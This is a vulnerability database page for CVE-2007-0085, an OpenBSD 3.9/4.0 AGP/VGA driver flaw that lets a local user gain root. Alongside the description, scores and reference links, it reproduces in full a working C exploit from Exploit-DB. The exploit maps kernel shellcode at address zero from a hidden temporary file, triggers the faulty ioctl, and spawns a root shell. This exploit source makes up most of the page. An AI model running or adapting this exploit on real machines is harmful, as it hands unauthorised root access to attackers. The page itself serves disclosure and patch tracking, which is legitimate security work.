CVE-2007-0085 : Detail

CVE-2007-0085

0.04%V3
Local
2007-01-05
10h00 +00:00
2017-07-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in sys/dev/pci/vga_pci.c in the VGA graphics driver for wscons in OpenBSD 3.9 and 4.0, when the kernel is compiled with the PCIAGP option and a non-AGP device is being used, allows local users to gain privileges via unspecified vectors, possibly related to agp_ioctl NULL pointer reference.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6 AV:L/AC:H/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3094

Publication date : 2007-01-06 23h00 +00:00
Author : Critical Security
EDB Verified : Yes

/* Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org) Some code had been stolen from noir's openbsd exploit sources Fix is available: ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007 Linkejimai neegzistuojancio fronto kariams ;] */ #include <sys/param.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <sys/agpio.h> #include <unistd.h> #include <err.h> #include <fcntl.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/mman.h> #include <sys/sysctl.h> #define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/ #define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/ char shellcode[]= "\x18\x00\x00\x00" "\x18\x00\x00\x00" "\x18\x00\x00\x00" /* some crap */ "\x18\x00\x00\x00" "\x18\x00\x00\x00" "\x18\x00\x00\x00" /* jmp 0x00000018 */ "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad" "\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred shellcode */ "\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04" "\xb8\x51\x47\x48\xd0" "\xff\xe0"; void usage() { printf("Usage: crit_obsd_ex target\n\n"); printf("valid targets:\n"); printf("(1)\tobsd 4.0 generic i386\n"); printf("(2)\tobsd 3.9 generic i386\n\n"); exit(0); } void get_proc(pid_t pid, struct kinfo_proc *kp) { u_int arr[4], len; arr[0] = CTL_KERN; arr[1] = KERN_PROC; arr[2] = KERN_PROC_PID; arr[3] = pid; len = sizeof(struct kinfo_proc); if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { perror("sysctl"); printf("this is an unexpected error, rerun!\n"); exit(-1); } } int main(int ac, char *av[]) { int i; void *p; int fd,failas; u_long pprocadr; struct kinfo_proc kp; printf("\n+--------------------------------------------+\n"); printf("| Critical Security local obsd root |\n"); printf("+--------------------------------------------+\n\n"); if (ac<2) usage(); if(atoi(av[1])==1) { for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i]; } else if(atoi(av[1])==2) { for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i]; } else {usage();} get_proc((pid_t) getpid(), &kp); pprocadr = (u_long) kp.kp_eproc.e_paddr; shellcode[24+5] = pprocadr & 0xff; shellcode[24+6] = (pprocadr >> 8) & 0xff; shellcode[24+7] = (pprocadr >> 16) & 0xff; shellcode[24+8] = (pprocadr >> 24) & 0xff; printf("[~] shellcode size: %d\n",sizeof(shellcode)); fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); if(fd < 0) err(1, "open"); write(fd, shellcode, sizeof(shellcode)); if((lseek(fd, 0L, SEEK_SET)) < 0) err(1, "lseek"); p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0); if (p == MAP_FAILED) err(1, "mmap"); printf("[~] map addr: 0x%x\n",p); printf("[~] exploiting...\n"); failas = open(AGP_DEVICE, O_RDWR); syscall(SYS_ioctl, failas, 0x80044103, NULL); close(failas); close(fd); seteuid(0); setuid(0); printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid()); execl("/bin/sh", "cyber", NULL); } // milw0rm.com [2007-01-07]

Products Mentioned

Configuraton 0

Openbsd>>Openbsd >> Version 3.9

Openbsd>>Openbsd >> Version 4.0

References

http://www.osvdb.org/32574
Tags : vdb-entry, x_refsource_OSVDB
http://marc.info/?l=openbsd-cvs&m=116785923301416&w=2
Tags : mailing-list, x_refsource_MLIST
http://www.openbsd.org/errata39.html#agp
Tags : vendor-advisory, x_refsource_OPENBSD
http://www.openbsd.org/errata.html#agp
Tags : vendor-advisory, x_refsource_OPENBSD
http://securitytracker.com/id?1017468
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/0043
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/23608
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=openbsd-cvs&m=116781980706409&w=2
Tags : mailing-list, x_refsource_MLIST